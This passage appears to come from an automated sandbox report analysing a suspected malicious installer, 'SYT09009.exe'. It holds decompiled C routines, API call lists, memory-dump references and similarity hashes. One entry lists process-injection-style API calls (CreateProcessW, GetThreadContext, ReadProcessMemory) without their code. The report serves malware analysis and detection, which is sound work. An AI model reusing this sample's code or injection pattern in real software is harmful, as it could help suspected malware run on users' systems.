GetTickCount.KERNEL32 ref: 0040313F
GetTickCount.KERNEL32 ref: 004031E6
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 0040320F
wsprintfA.USER32 ref: 0040321F

Strings

... %d%%, xrefs: 00403219
H&B, xrefs: 004031C3, 004031DE, 00403255

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$H&B
API String ID: 551687249-396405796
Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 004056E4, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056E4(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x004056ef
0x004056f3
0x004056f6
0x004056fc
0x00405700
0x00405704
0x0040570c
0x00405713
0x00405719
0x00405720
0x00405727
0x0040572f
0x00405731
0x00000000
0x00405731
0x0040573b
0x00405742
0x00405758
0x00000000
0x00000000
0x00000000
0x0040575a
0x0040575e

APIs

CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
GetLastError.KERNEL32 ref: 0040573B
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
GetLastError.KERNEL32 ref: 0040575A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
C:\Users\user\Desktop, xrefs: 004056E4

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-1521822154
Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406492, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406492(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}

0x004064a9
0x004064b2
0x004064b4
0x004064b4
0x004064b8
0x004064ca
0x004064c4
0x004064c4
0x004064c4
0x004064ce
0x004064e2
0x004064f6
0x004064fd

APIs

GetSystemDirectoryA.KERNEL32 ref: 004064A9
wsprintfA.USER32 ref: 004064E2
LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 004064F6

Strings

UXTHEME, xrefs: 0040649B
\, xrefs: 004064BA
%s%s.dll, xrefs: 004064DC

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405CBF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CBF(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3d4; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}

0x00405cc3
0x00405cc9
0x00405cca
0x00405cca
0x00405ccf
0x00405cd0
0x00405cd3
0x00405cdd
0x00405cea
0x00405ced
0x00405cf5
0x00000000
0x00000000
0x00405cf9
0x00000000
0x00000000
0x00405cfb
0x00000000
0x00405cfb
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405CD3
GetTempFileNameA.KERNEL32(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
nsa, xrefs: 00405CCA
"C:\Users\user\Desktop\SYT09009.exe" , xrefs: 00405CBF

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\SYT09009.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-3880154348
Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758

Uniqueness

Uniqueness Score: -1.00%

Function 02440034, Relevance: 6.7, APIs: 4, Instructions: 703processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 0244056E
GetThreadContext.KERNEL32(?,00010007), ref: 02440591
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 024405B5

Memory Dump Source

Source File: 00000000.00000002.251064774.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false

Similarity

API ID: Process$ContextCreateMemoryReadThread
String ID:
API String ID: 2411489757-0
Opcode ID: 6b569a3a493d70dd101e235812c994ff066fac5df327c8108b931b8231b4d34b
Instruction ID: 344ccc0513bf15260e379443790b26cf6fd78fbcec6e9aa82de0d0e09f26700e
Opcode Fuzzy Hash: 6b569a3a493d70dd101e235812c994ff066fac5df327c8108b931b8231b4d34b
Instruction Fuzzy Hash: 4C524631E50258AEEB64CBA4ED51BFDB7B1AF48700F20549AE608EA2A0D7705ED0DF05

Uniqueness

Uniqueness Score: -1.00%

Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040209D(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f4f8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4c8 =  *0x42f4c8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E0040521E(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b878, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004038AA(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x0040209d
0x0040209d
0x004020a2
0x004020a9
0x00402164
0x004022dd
0x004022dd
0x00402a5a
0x00402a5d
0x00402a69
0x00402a69
0x004020b8
0x004020c2
0x004020c5
0x004020d4
0x004020d8
0x004020de
0x004020e2
0x0040215d
0x00000000
0x0040215d
0x004020e4
0x004020ed
0x004020f1
0x00402135
0x004020f3
0x004020f6
0x004020f9
0x00402129
0x004020fb
0x004020fe
0x00402107
0x00402109
0x00402109
0x00402107
0x004020f9
0x0040213d
0x00402152
0x00402152
0x00000000
0x0040213d
0x004020c8
0x004020ce
0x004020d2
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020C8

Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00422648,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00422648,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422648,7519EA30), ref: 0040527A
Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052B2
Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052CC
Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052DA

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020D8
GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 7d01c9a26376e903ef8f956939bf13d5e0cf1485282589c35b64df24d5e4481f
Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
Opcode Fuzzy Hash: 7d01c9a26376e903ef8f956939bf13d5e0cf1485282589c35b64df24d5e4481f
Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E

Uniqueness

Uniqueness Score: -1.00%

Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405B28(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405ABA(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E00405761(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040577E(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E004056E4(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}

0x004015bb
0x004015c2
0x004015c5
0x004015ca
0x004015ce
0x004015d0
0x004015d8
0x004015da
0x004015dc
0x004015e0
0x004015e3
0x004015fb
0x004015fc
0x004015e5
0x004015e5
0x004015e8
0x00000000
0x004015f3
0x004015f4
0x004015f4
0x004015e8
0x00401603
0x0040160a
0x00401617
0x00401617
0x0040160c
0x0040160d
0x00401615
0x00000000
0x00000000
0x00401615
0x0040160a
0x0040161a
0x0040161d
0x0040161f
0x00401620
0x004015d0
0x00401627
0x00401652
0x004022dd
0x00401629
0x0040162b
0x00401636
0x0040163c
0x00401644
0x0040164a
0x0040164a
0x00401644
0x00402a5d
0x00402a69

APIs

Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F

GetFileAttributesA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 004056E4: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727

SetCurrentDirectoryA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 1892508949-1943935188
Opcode ID: f83e9c126ec5e5627e04690920b1fc6d95bfd0f8b27b2dc86f60bbb393f00223
Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
Opcode Fuzzy Hash: f83e9c126ec5e5627e04690920b1fc6d95bfd0f8b27b2dc86f60bbb393f00223
Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f470;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42ec0c =  *0x42ec0c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec0c, 0x7530,  *0x42ebf4), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32 ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D

Uniqueness

Uniqueness Score: -1.00%

Function 00406500, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406500(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a240);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
				}
				_t5 = E00406492(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406508
0x0040650b
0x00406512
0x0040651a
0x00406526
0x00000000
0x0040652d
0x0040651d
0x00406524
0x00000000
0x00406535
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
GetProcAddress.KERNEL32(00000000,?), ref: 0040652D

Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32 ref: 004064A9
Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
Part of subcall function 00406492: LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 004064F6

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C90, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405C90(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405c94
0x00405ca1
0x00405cb6
0x00405cbc

APIs

GetFileAttributesA.KERNEL32(00000003,00402EE1,C:\Users\user\Desktop\SYT09009.exe,80000000,00000003), ref: 00405C94
CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00405C6B, Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C6B(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405c70
0x00405c76
0x00405c7b
0x00405c84
0x00405c84
0x00405c8d

APIs

GetFileAttributesA.KERNEL32(?,?,00405883,?,?,00000000,00405A66,?,?,?,?), ref: 00405C70
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C84

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction ID: e57869254d9b62c000b772120ebafc6e643eb49c03cb969dc299021a919e5f7f
